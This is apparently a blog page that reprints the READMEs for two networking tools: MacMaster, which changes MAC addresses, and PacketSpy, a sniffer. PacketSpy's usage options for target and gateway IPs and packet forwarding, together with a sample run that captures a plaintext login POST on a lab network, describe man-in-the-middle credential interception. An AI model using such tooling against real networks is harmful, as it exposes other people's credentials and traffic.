bug.sudo
.MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.
MacMaster requires Python 3.6 or later.
$ git clone https://github.com/HalilDeniz/MacMaster.git
cd MacMaster
$ python setup.py install
$ macmaster --help
usage: macmaster [-h] [--interface INTERFACE] [--version]
[--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]
MacMaster: Mac Address Changer
options:
-h, --help show this help message and exit
--interface INTERFACE, -i INTERFACE
Network interface to change MAC address
--version, -V Show the version of the program
--random, -r Set a random MAC address
--newmac NEWMAC, -nm NEWMAC
Set a specific MAC address
--customoui CUSTOMOUI, -co CUSTOMOUI
Set a custom OUI for the MAC address
--reset, -rs Reset MAC address to the original value
--interface
, -i
: Specify the network interface.--random
, -r
: Set a random MAC address.--newmac
, -nm
: Set a specific MAC address.--customoui
, -co
: Set a custom OUI for the MAC address.--reset
, -rs
: Reset MAC address to the original value.--version
, -V
: Show the version of the program.$ macmaster.py -i eth0 -nm 00:11:22:33:44:55
$ macmaster.py -i eth0 -r
$ macmaster.py -i eth0 -rs
$ macmaster.py -i eth0 -co 08:00:27
$ macmaster.py -V
Replace eth0
with your desired network interface.
You must run this script as root or use sudo to run this script for it to work properly. This is because changing a MAC address requires root privileges.
Contributions are welcome! To contribute to MacMaster, follow these steps:
For any inquiries or further information, you can reach me through the following channels:
PacketSpy is a powerful network packet sniffing tool designed to capture and analyze network traffic. It provides a comprehensive set of features for inspecting HTTP requests and responses, viewing raw payload data, and gathering information about network devices. With PacketSpy, you can gain valuable insights into your network's communication patterns and troubleshoot network issues effectively.
git clone https://github.com/HalilDeniz/PacketSpy.git
PacketSpy requires the following dependencies to be installed:
pip install -r requirements.txt
To get started with PacketSpy, use the following command-line options:
root@denizhalil:/PacketSpy# python3 packetspy.py --help
usage: packetspy.py [-h] [-t TARGET_IP] [-g GATEWAY_IP] [-i INTERFACE] [-tf TARGET_FIND] [--ip-forward] [-m METHOD]
options:
-h, --help show this help message and exit
-t TARGET_IP, --target TARGET_IP
Target IP address
-g GATEWAY_IP, --gateway GATEWAY_IP
Gateway IP address
-i INTERFACE, --interface INTERFACE
Interface name
-tf TARGET_FIND, --targetfind TARGET_FIND
Target IP range to find
--ip-forward, -if Enable packet forwarding
-m METHOD, --method METHOD
Limit sniffing to a specific HTTP method
root@denizhalil:/PacketSpy# python3 packetspy.py -tf 10.0.2.0/24 -i eth0
Device discovery
**************************************
Ip Address Mac Address
**************************************
10.0.2.1 52:54:00:12:35:00
10.0.2.2 52:54:00:12:35:00
10.0.2.3 08:00:27:78:66:95
10.0.2.11 08:00:27:65:96:cd
10.0.2.12 08:00:27:2f:64:fe
root@denizhalil:/PacketSpy# python3 packetspy.py -t 10.0.2.11 -g 10.0.2.1 -i eth0
******************* started sniff *******************
HTTP Request:
Method: b'POST'
Host: b'testphp.vulnweb.com'
Path: b'/userinfo.php'
Source IP: 10.0.2.20
Source MAC: 08:00:27:04:e8:82
Protocol: HTTP
User-Agent: b'Mozilla/5.0 (X11; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0'
Raw Payload:
b'uname=admin&pass=mysecretpassword'
HTTP Response:
Status Code: b'302'
Content Type: b'text/html; charset=UTF-8'
--------------------------------------------------
Https work still in progress
Contributions are welcome! To contribute to PacketSpy, follow these steps:
If you have any questions, comments, or suggestions about PacketSpy, please feel free to contact me:
PacketSpy is released under the MIT License. See LICENSE for more information.